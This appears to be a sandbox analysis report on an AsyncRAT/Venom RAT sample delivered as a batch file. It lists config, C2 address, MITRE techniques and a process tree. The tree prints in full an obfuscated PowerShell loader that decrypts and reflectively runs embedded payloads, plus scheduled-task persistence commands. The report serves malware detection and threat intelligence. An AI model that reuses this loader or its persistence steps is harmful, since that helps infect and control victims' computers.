asyncrat | 85d20a24df655ec1f11e1c39f5f4d74dfce232321dbe6b41a5159a8cf6073ca1

Analysis

max time kernel
103s
max time network
105s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
29-05-2024 14:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.bat
Size

285KB
MD5

d8cfc3f47a867b0e75997070c3281de8
SHA1

141a013d4677b2c2453b429372d6373b1a187c63
SHA256

85d20a24df655ec1f11e1c39f5f4d74dfce232321dbe6b41a5159a8cf6073ca1
SHA512

9da1cc237a7c324457b3c72ee31403edea528c6bb82e2a464fd29be70a4bf50a7fceabfeefb408e317b8dc0100ec6ffe7575182b6c3e7fa91f2e4767bfb84eac
SSDEEP

6144:VQJ7TjZvuij8u3zn0YXT59/MD7/QGWwNfmkDbWibZ5LPN2:VijZvuijfz8XbZNY

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

147.185.221.19:38173

Mutex

uuhaiushdishajkdhwuasudh

Attributes

delay
1
install
true
install_file
svhost.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/3780-48-0x0000026EF2D90000-0x0000026EF2DA8000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3560 powershell.exe
2812 powershell.exe
3780 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

svhost.exe

pid process

1944 svhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3016 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3948 timeout.exe

pid	process
1944	svhost.exe

pid	process
3016	schtasks.exe

pid	process
3948	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

powershell.exepowershell.exepowershell.exesvhost.exemsedge.exemsedge.exe

pid	process
3560	powershell.exe
3560	powershell.exe
2812	powershell.exe
2812	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
1944	svhost.exe
1944	svhost.exe
3044	msedge.exe
3044	msedge.exe
1592	msedge.exe
1592	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

msedge.exe

pid process

3044 msedge.exe
3044 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3560	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeIncreaseQuotaPrivilege	2812	powershell.exe
Token: SeSecurityPrivilege	2812	powershell.exe
Token: SeTakeOwnershipPrivilege	2812	powershell.exe
Token: SeLoadDriverPrivilege	2812	powershell.exe
Token: SeSystemProfilePrivilege	2812	powershell.exe
Token: SeSystemtimePrivilege	2812	powershell.exe
Token: SeProfSingleProcessPrivilege	2812	powershell.exe
Token: SeIncBasePriorityPrivilege	2812	powershell.exe
Token: SeCreatePagefilePrivilege	2812	powershell.exe
Token: SeBackupPrivilege	2812	powershell.exe
Token: SeRestorePrivilege	2812	powershell.exe
Token: SeShutdownPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeSystemEnvironmentPrivilege	2812	powershell.exe
Token: SeRemoteShutdownPrivilege	2812	powershell.exe
Token: SeUndockPrivilege	2812	powershell.exe
Token: SeManageVolumePrivilege	2812	powershell.exe
Token: 33	2812	powershell.exe
Token: 34	2812	powershell.exe
Token: 35	2812	powershell.exe
Token: 36	2812	powershell.exe
Token: SeIncreaseQuotaPrivilege	2812	powershell.exe
Token: SeSecurityPrivilege	2812	powershell.exe
Token: SeTakeOwnershipPrivilege	2812	powershell.exe
Token: SeLoadDriverPrivilege	2812	powershell.exe
Token: SeSystemProfilePrivilege	2812	powershell.exe
Token: SeSystemtimePrivilege	2812	powershell.exe
Token: SeProfSingleProcessPrivilege	2812	powershell.exe
Token: SeIncBasePriorityPrivilege	2812	powershell.exe
Token: SeCreatePagefilePrivilege	2812	powershell.exe
Token: SeBackupPrivilege	2812	powershell.exe
Token: SeRestorePrivilege	2812	powershell.exe
Token: SeShutdownPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeSystemEnvironmentPrivilege	2812	powershell.exe
Token: SeRemoteShutdownPrivilege	2812	powershell.exe
Token: SeUndockPrivilege	2812	powershell.exe
Token: SeManageVolumePrivilege	2812	powershell.exe
Token: 33	2812	powershell.exe
Token: 34	2812	powershell.exe
Token: 35	2812	powershell.exe
Token: 36	2812	powershell.exe
Token: SeIncreaseQuotaPrivilege	2812	powershell.exe
Token: SeSecurityPrivilege	2812	powershell.exe
Token: SeTakeOwnershipPrivilege	2812	powershell.exe
Token: SeLoadDriverPrivilege	2812	powershell.exe
Token: SeSystemProfilePrivilege	2812	powershell.exe
Token: SeSystemtimePrivilege	2812	powershell.exe
Token: SeProfSingleProcessPrivilege	2812	powershell.exe
Token: SeIncBasePriorityPrivilege	2812	powershell.exe
Token: SeCreatePagefilePrivilege	2812	powershell.exe
Token: SeBackupPrivilege	2812	powershell.exe
Token: SeRestorePrivilege	2812	powershell.exe
Token: SeShutdownPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeSystemEnvironmentPrivilege	2812	powershell.exe
Token: SeRemoteShutdownPrivilege	2812	powershell.exe
Token: SeUndockPrivilege	2812	powershell.exe
Token: SeManageVolumePrivilege	2812	powershell.exe
Token: 33	2812	powershell.exe
Token: 34	2812	powershell.exe
Token: 35	2812	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

msedge.exe

pid	process
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe
3044	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.execmd.execmd.exemsedge.exe

description	pid	process	target process
PID 540 wrote to memory of 3560	540	cmd.exe	powershell.exe
PID 540 wrote to memory of 3560	540	cmd.exe	powershell.exe
PID 3560 wrote to memory of 2812	3560	powershell.exe	powershell.exe
PID 3560 wrote to memory of 2812	3560	powershell.exe	powershell.exe
PID 3560 wrote to memory of 4716	3560	powershell.exe	WScript.exe
PID 3560 wrote to memory of 4716	3560	powershell.exe	WScript.exe
PID 4716 wrote to memory of 4068	4716	WScript.exe	cmd.exe
PID 4716 wrote to memory of 4068	4716	WScript.exe	cmd.exe
PID 4068 wrote to memory of 3780	4068	cmd.exe	powershell.exe
PID 4068 wrote to memory of 3780	4068	cmd.exe	powershell.exe
PID 3780 wrote to memory of 3892	3780	powershell.exe	cmd.exe
PID 3780 wrote to memory of 3892	3780	powershell.exe	cmd.exe
PID 3780 wrote to memory of 4604	3780	powershell.exe	cmd.exe
PID 3780 wrote to memory of 4604	3780	powershell.exe	cmd.exe
PID 4604 wrote to memory of 3948	4604	cmd.exe	timeout.exe
PID 4604 wrote to memory of 3948	4604	cmd.exe	timeout.exe
PID 3892 wrote to memory of 3016	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 3016	3892	cmd.exe	schtasks.exe
PID 4604 wrote to memory of 1944	4604	cmd.exe	svhost.exe
PID 4604 wrote to memory of 1944	4604	cmd.exe	svhost.exe
PID 3044 wrote to memory of 2248	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 2248	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 5072	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 1592	3044	msedge.exe	msedge.exe
PID 3044 wrote to memory of 1592	3044	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BUKiAL31A5lT1/Xd5G5EmJWEX7sPvy0fexqhE5k6bBA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2NxhLszSFSKFC6LeW0LZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $teDyb=New-Object System.IO.MemoryStream(,$param_var); $JJOvu=New-Object System.IO.MemoryStream; $PzvNj=New-Object System.IO.Compression.GZipStream($teDyb, [IO.Compression.CompressionMode]::Decompress); $PzvNj.CopyTo($JJOvu); $PzvNj.Dispose(); $teDyb.Dispose(); $JJOvu.Dispose(); $JJOvu.ToArray();}function execute_function($param_var,$param2_var){ $bcxuR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mgbCE=$bcxuR.EntryPoint; $mgbCE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$TDoDY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client.bat').Split([Environment]::NewLine);foreach ($szRyi in $TDoDY) { if ($szRyi.StartsWith(':: ')) { $kbvkz=$szRyi.Substring(3); break; }}$payloads_var=[string[]]$kbvkz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_62_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_62.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_62.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_62.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BUKiAL31A5lT1/Xd5G5EmJWEX7sPvy0fexqhE5k6bBA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2NxhLszSFSKFC6LeW0LZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $teDyb=New-Object System.IO.MemoryStream(,$param_var); $JJOvu=New-Object System.IO.MemoryStream; $PzvNj=New-Object System.IO.Compression.GZipStream($teDyb, [IO.Compression.CompressionMode]::Decompress); $PzvNj.CopyTo($JJOvu); $PzvNj.Dispose(); $teDyb.Dispose(); $JJOvu.Dispose(); $JJOvu.ToArray();}function execute_function($param_var,$param2_var){ $bcxuR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mgbCE=$bcxuR.EntryPoint; $mgbCE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_62.bat';$TDoDY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_62.bat').Split([Environment]::NewLine);foreach ($szRyi in $TDoDY) { if ($szRyi.StartsWith(':: ')) { $kbvkz=$szRyi.Substring(3); break; }}$payloads_var=[string[]]$kbvkz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3780
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"' & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3892
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:3016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8EB3.tmp.bat""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4604
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:3948
        
        C:\Users\Admin\AppData\Roaming\svhost.exe
        
        "C:\Users\Admin\AppData\Roaming\svhost.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://docs.oracle.com/javase/8/docs
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97f493cb8,0x7ff97f493cc8,0x7ff97f493cd8
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,6076079674858346037,11575318921499561499,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:5072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,6076079674858346037,11575318921499561499,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,6076079674858346037,11575318921499561499,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8
  2⤵
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,6076079674858346037,11575318921499561499,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
  2⤵
  PID:4276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,6076079674858346037,11575318921499561499,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:456

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2160

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4508

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
23da8c216a7633c78c347cc80603cd99

SHA1
a378873c9d3484e0c57c1cb6c6895f34fee0ea61

SHA256
03dbdb03799f9e37c38f6d9d498ad09f7f0f9901430ff69d95aa26cae87504d3

SHA512
d34ae684e8462e3f2aba2260f2649dee01b4e2138b50283513c8c19c47faf039701854e1a9cbf21d7a20c28a6306f953b58ffb9144ead067f5f73650a759ff17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a8e4bf11ed97b6b312e938ca216cf30e

SHA1
ff6b0b475e552dc08a2c81c9eb9230821d3c8290

SHA256
296db8c9361efb62e23be1935fd172cfe9fbcd89a424f34f347ec3cc5ca5afad

SHA512
ce1a05df2619af419ed3058dcbd7254c7159d333356d9f1d5e2591c19e17ab0ac9b6d3e625e36246ad187256bee75b7011370220ef127c4f1171879014d0dd76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
ca9ef3538528498ee32dca88ec6b968c

SHA1
18d8af333d57fab58c64367f90419d72b27e0806

SHA256
499a19f3e053a7724c2cf5115010543ae8ed77c7efaa70ea46863c83e17941d6

SHA512
745f0670b87637045d1112ea62a7ba662bf87100a13528d073950da893c21722ee686c0c1b89bda235d07ba9de4ba77fcb2c95b527f49ca4c1583c75bb5069fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
185B

MD5
1e4b0f7d680a550b0d6b4cc3d19e0475

SHA1
161df453455912ff927f61c2f369576e47dbeaf0

SHA256
f263c3dbb0eb726e1ff4da3a620838f7a57e697ee1f301a97eab7b57cead31fc

SHA512
0ad92894c3ee7465547cdb265402275f2d178dab89720d518130391bc1edd01791b2ed3bdf16968184bf4d736a9216a9f7ac43833b27ecece54bb6c8e60d5136

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9ae393d52c63cd4e3c9e1f58b8332243

SHA1
f34f87a52aecd3dd792499230579dd2f6294e2f8

SHA256
5cc47f62e86418f529f4e8e933fc443023c57807cc8ca4e19b76dedc5b6ef3d1

SHA512
98e2a160f3709d4d092531ef13d9af4910a25f2c713c00afe22fd9f860ad3c41ac9860aa263d6f7afb6cfcee8030ecd10f25f696838cee73cd1fe309e2fe5799

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f22ce11a48dca931346d41aaf7940740

SHA1
62e2f3629632a41e6f65fc45178d291598b29a66

SHA256
1ed8f75e5b07621057f71d45106fa7fc54e3ee918843ed13eb56b96a31f3315a

SHA512
2dd9a04b05f514c99a252880ff50166629ab95676fc6a104d5d839e940e3d3f3ff0d1b140390cadd534d66f5c9d3a6e0065642ce462fc8d8eace4ec2df407429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
0a7c07d235df32d9b85e23aff74a2358

SHA1
ff523933b63c7a071871d1930bb02e5acee237a7

SHA256
f15a7188e55ba6dcc803650ad0dd26d30b650c815c123c06d1ce6efd94777eec

SHA512
9ab4c5bbaf8b220e353e3628b8818971becbd762ab65d23aaa499051ed75f256f58b17602b996ec47bcba7de59d8974e758b16ae53ceeab96d00c7eb7c77ddbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb15ee5741b379245ca8549cb0d4ecf8

SHA1
3555273945abda3402674aea7a4bff65eb71a783

SHA256
b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

SHA512
1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lepvbsfg.h1f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8EB3.tmp.bat

Filesize
150B

MD5
f950040d0c1cd6177c7256f7047f6e55

SHA1
b3c9fef412f06b97d80b965ae65454addc208744

SHA256
